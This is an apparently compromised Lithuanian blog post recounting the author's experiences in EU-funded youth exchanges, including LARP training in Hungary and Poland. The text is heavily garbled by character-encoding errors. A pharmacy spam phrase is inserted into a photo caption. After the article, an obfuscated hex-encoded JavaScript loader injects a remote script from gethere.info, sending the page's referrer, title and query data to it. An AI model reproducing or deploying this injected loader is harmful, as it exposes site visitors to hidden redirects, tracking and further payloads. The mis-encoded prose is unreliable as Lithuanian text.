Europos SA�junga a�� iA?naudok tarptautiniA? jaunimo projektA? galimybA�

A�Tau daugiau nei 16 metA?? Mokaisi, studijuoji, groji gitara, mA�gsti vaidinti, skaityti knygas,A� o gal patinka kalbA�ti apie politikA�, ekonomikA�, Europos SA�jungA� ir jos veiklA�, o gal tiesiog dar bandai jA� atrasti? Turi tiek daug idA�jA?, bet neA?inai kur jas realizuoti? MA�gsti keliauti, bet neturi tiek santaupA?, kad galA�tum tai padaryti?

Kaip puiku, kad tu gyveni Europos SA�jungoje! Ar kada domA�jaisi tarptautiniais jaunimo projektais? A�iame straipsnyje papasakosiu savo A?spA�dA?ius iA? keliA? projektA?.

Tarptautinis jaunimo projektas Lenkijoje

Tarptautinis jaunimo projektas Lenkijoje

Likimas visA� laikA� viskA� sudA�lioja A? savas vietas.A� Atsirandi ten, kur galbA�t niekada nepagalvojai atsirasti. Atrandi save ten, kur niekada nesitikA�jai. Kad ir kA� bedarytum, ko benorA�tum, ko besitikA�tum, nutiks tai, kas turi nutikti. Taip nutiko ir man. Niekada nesidomA�jau tarptautiniais jaunimo projektais. GalbA�t per maA?ai buvau susidA�rusi su informacija apie tokius dalykus.

VisiA?kai atsitiktinai internetinA�je erdvA�je perskaiA?iau a�zLietuvos jaunimo centroa�? pasiA�lymA� dalyvauti tarptautiniame jaunimo projekte. NusiunA?iau motyvacinA? laiA?kA�, nors atsakymo visiA?kai nesitikA�jau, juk neturA�jau visiA?kai jokios patirties jaunimo srityje. Tos paA?ios dienos vakare sulaukiau atsakymo, kad jie manimi susidomA�jo ir aA? galiu vykti A? projektA�. A?inoma paskui turA�jau vykti A? VilniA?. SusipaA?inau su kitais dalyviais, suA?inojau daugiau informacijos ir patarimA?. PradA?ioje nesupratau tiksliai A?io projekto idA�jos, viskas iA?aiA?kA�jo nuvykus A? VengrijA�.

Projektas Vengijoje. Nuotraukoje Lietuvos ir Italijos dalyvA�s.

Projektas Vengijoje. Nuotraukoje Lietuvos ir Italijos dalyvA�s.

PaA?iA� pirmA� dienA� visi A?sikA�rA�me, A?aisminga forma susipaA?inome. Projekte dalyvavo A?eA?iA? A?aliA? grupelA�s: Lietuva, Lenkija, Vengrija, A?ekija, Italija, Rumunija. Visi dalyviai atvyko vedini skirtingA? tikslA? a�� vieni norA�jo papildyti turimas A?inias naujais ugdymo metodais, palyginti LARP su teatru ar pasidalinti A?iniomis ir turima patirtimi. Pirmoji mokymA? dalis truko 5 dienas. Visi buvo orientuoti A? susipaA?inimA�, komandinA? darbA�. A?inoma, bA�dami komandoje tuo paA?iu galA�jome geriau paA?inti save, savo asmenines savybes bei iA?mokti gerbti ir toleruoti kitA? nariA? vertybes ir asmenybA�s bruoA?us. Svarbu paminA�ti, kad iA?mokstama gerbtiA� skirtingA? kultA�rA? vertybes, skirtingas asmenybes.A� Juk projektas vykoA� Europos mastu. KultA�riniai vakarai a�� kiekvienos A?alies grupA� turA�jo progA� pristatyti savo A?alA?, paproA?ius, maistA�, kultA�ra.

Antroji mokymA? dalis buvo susijusi su LARP A?aidimu. UA?siA�mA�me uA?duotimis, kurios padA�jo A?sijausti A? vadinimA�. PrieA? paskutinA�s dienos rytA� visa grupA� suA?inojo maA?daug apie kA� bus vaidinimas. Toks LARPa�?o tikslas, viskA� atskleisti paskutinA� minutA�. Kiekvienas dalyvis savo rolA� suA?ino likus iki vaidinimo kelioms valandoms. Niekam iki pat vaidinimo negali atskleisti kokA? vaidmenA? gavai.

PrieA? vadinimA� turA�jome pasiruoA?ti patalpas, kuriose vaidinsime. Visi susigriebA� priemones, kurios bus reikalingos ruoA?ti patalpas, iA?vykome A? apleistA� kaimelio mokyklA�, kuri prieA? 10 metA? buvo. UA?A�jus A? vidA? mus pasitiko drA�gmA�s kvapas, iA?mA�tyti rA�bai, seni suolai a�� apleista aplinka. Patys turA�jome pasiruoA?ti vaidinimui skirtA� vietA�. Apie 22 valandA� kiekvienas jau A?inojome savo rolA�, senoji mokykla buvo paruoA?ta vaidinimui. Beliko susiruoA?ti patiems a�� iA?sirinkti tinkamA� aprangA�, pasidaryti makiaA?us. Visi buvo nustebA�, kai pamatA� savo kolegas virtusius rimtais politikais, valdA?ios pareigA�nais, mielais turistais, pamiA?A�liais, daktarais, tardytojais ir panaA?iai.

Veiksmas nusikA�lA� A? 1977-uosius metus, KaliningradA�. Valstybinis saugumo komitetas sodina A? kalA�jimA� A?tartinus asmenis ir siekia iA?gauti kuo daugiau informacijos apie galimA� DidA?iosios Amerikos sA�jungos siekA? galutinai sunaikinti A?alA?. Visi A?aidimo dalyviai turi savo A?tariamA?jA?, stengiamasi bendrauti su visais, bet tuo paA?iu A? visus A?tariamai A?velgiama, nes net saugumo komitete gali bA�ti apsiA?aukA�liA?. Pagrindinis tikslas a�� surasti dokumentA�, kuriame esama naudingos informacijos, kurioje galima rasti visus atsakymus. Vaidinimas buvo nutrauktas projekto organizatoriA?, nes A?aidimo dalyviams nepavyko to padaryti. Visas vaidinimas uA?truko virA? 3 valandA?. Vyksmas nusikA�lA� A? 1979 metus, SovietmetA?. Visi dalyviai gavo skirtingus vaidmenis: valdA?ios pareigA�nai, tardytojai, beproA?iai, uA?sienieA?iai, seselA�s, daktarai ir kt. Vaidinimo atmosfera nereali a�� vidurnaktis, mokykloje nA�ra elektros, visur pilna A?vakiA?. IA? A?ono galbA�t ir kraupokas vaizdas a�� A?vakiA? A?viesa, visi aplinkui rA�kauja, vieni atrodo kaip iA?protA�jA�, kiti nesupranta kas darosi. Vienas A?domiausiA? ir pagrindiniA? A?io vaidinimo dalykA? a�� nA�ra jokiA? A?iA�rovA?, nes patys „aktoriai“ tuo pat metu vaidina ir stebi vaidinimA�. Po A?io vadinimo visi vien tik diskutavo ir dar ilgai negalA�jo pamirA?ti to kas A?vyko.

Projektas Vengrijoje

Projektas Vengrijoje

LARP a�� vaizduotA�s karalystA�

LARP yra neformalaus ugdymo metodas. ProjektA? mokymA? kurso tikslas, naudojant A?A? metodA�A� yra perduoti A?inias kaip naudoti LARP dirbant su jaunimu. Visa LARPa�?o idA�ja gimA� Lenkijoje, Liublino regione. Projekto organizatoriai, vadinami The game master, daA?niausiai patys susigalvoja vaidinimo istorijA� arba pritaiko fantastinA�s knygos ar filmo idA�jA�, panaudoja istorinius A?vykius. Projekto metu jie po truputA? paA?A?sta dalyvius, stebi jA? elgesA?, asmenybA�s bruoA?us, o po keliA? dienA? pritaiko veikA�jus. Vaidinimo metu A?aidimo organizatorius stebi vaidinimA�, o jei pamato, kad kas nors neturi kA� veikti, tai duoda naujas uA?duotis, paskleidA?ia kokiA� nors informacijA�. Jis valdo visA� A?aidimA�, daugiau nei 50 procentA? nuo jo priklauso A?aidimo baigtis. PriA?iA�rA�damas A?aidimA� bei dalyvius, jis gali tuo paA?iu ir vaidinti.

PrieA? A?aidimA�, daA?niausiai nusistatomos taisyklA�s, kA� galima ir ko negalima daryti A?aidimo metu. Pirmoji ir pagrindinA� A?aidimo taisyklA� a�� pasilinksmink. Svarbu prisiminti, kad nei vienas nA�ra profesionalus aktorius. Taip pat neverta jaudinti, jei A?aidimo metu nepavyko A?vykdyti savo uA?duoties, svarbu gerai praleistas laikas. Antroji pagrindinA� taisyklA� a�� neliesti kito A?mogaus. A�i taisyklA� svarbi, nes A?monA�s gali susiA?eisti arba jiems tiesiog nemalonu, kai jA? lieA?ia kitas A?mogus. Taip pat A?aidimo metu galima pasitraukti iA? jo arba tiesiog padaryti pertraukA�lA�, bet apie tai turi bA�ti praneA?ta A?aidimo organizatoriui. Taigi, A?A? A?aidimA� galima A?aisti ir draugA? bA�ryje.

Nuotraukos iA? LAPR A?aidimo

ProjektA? A?vairovA�

Apie patA? pirmA�jA? projektA� suA?inojau iA? a�zLietuvos jaunimo centroa�?. A�is centras yra A?sikA�rA�s Vilniuje. Jie daA?niausiai ieA?ko savanoriA?, atrenka kandidatus ir siunA?ia A? A?vairius projektus. Daugiau informacijos galima rasti jA? „Facebook“ paskyroje Lietuvos jaunimo centras, arba internetiniame puslapyje www.ljc.lt. Taip pat A?vairius projektA? pasiA�lymus rasi internetinA�je svetainA�je.

AntrA� kartA� dalyvavau projekte, kuris taip pat buvo susijA�s su LARP A?aidimu. TaA?iau A?A? kartA� dalyviai atvyko aptarti buvusios projektus, pasidalinti savo patirtimi, o paskutinA�mis projekto dienomis paraA?A� informacinA� LARP knygelA�.A� TreA?iajame projekte, kuris vyko irgi Lenkijoje, jaunimas susitiko aptarti subkultA�ras. Projekto tema a�zSubcultures a�� Colours of Europea�?. A�iame projekte dalyviai turA�jo galimybA� pabA�ti renginio organizatoriais, pravesti uA?siA�mimus. Vienas vakaras buvo skirtas hipiA? subkultA�rai a�� puoA?A�me kambarius, su daA?ais, kurie skirti audiniams daA?A�me palaidines ryA?kiomis spalvomis, klausA�me hipiA? muzikos. Vyko diskusijos A?vairiomis apie A?vairias subkultA�ras.

PasiruoA?imas hipiA? vakarui

PasiruoA?imas hipiA? vakarui

 

PalaidiniA? daA?ymo procesas

PalaidiniA? daA?ymo procesas

Dalyvavau projekte, kuris vyko ir Lietuvoje. A�vairaus amA?iaus jaunimas susirinko A�iA?gvildenti A?vairiA? Europos A?aliA? jaunimo nedarbo problemA�, emigracijA�, A?vietimo problemas. Organizatoriai pasirinko emigracijos temA�, kaip specifinA� problemA�, todA�l prieA? atvykdami projekto dalyviai gavo uA?duotA? a�� atlikti emigracijos ir imigracijos tyrimA� jaunA? A?moniA? tarpe. Naudojantis A?vairiais neformalaus A?vietimo metodais, jaunimas dalinosi savo patirtimi, stebA�jo save ir kitus dalyvius, aiA?kinosi savanorystA�s ir jaunimo iniciatyvA? teikiamus privalumus.

Svarbu paminA�ti, kad projekto metu jaunimas ne vien tik dirba projekto tema. Vakarais atsipalaiduoja, iA?sitraukia gitaras, A?aidA?ia A?vairius A?aidimus.A� Galima pagalvoti, kaip jaunimui pavyksta kartu, iA? skirtingA? A?aliA? arA� kultA�rA? iA?gyventi savaitA� ar ilgiau. Per tA� savaitA� visi taip susigyvena ir susibendrauja, tampa lyg viena A?eima. Projekto pabaigoje bA�na labai sunku iA?siskirti. TaA?iau smagu pamatyt tuos paA?ius veidus kituose projektuose.

Ne vien rimti darbai, bet ir A?aidimai

accutane acne treatment to buy uk. Ne vien rimti darbai, bet ir A?aidimai

Tokie projektai daA?niausiai bA�na remiami Europos SA�jungos, todA�l apgyvendinimas, maistas ir ekskursijos vyksta nemokamai, o uA? bilietus atiduodama 70 procentA?. Tai puiki galimybA� pakeliauti, susirasti naujA? draugA?, suA?inoti daug A?domiA? ir naudingA? dalykA?.

 

 

 

 

 var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}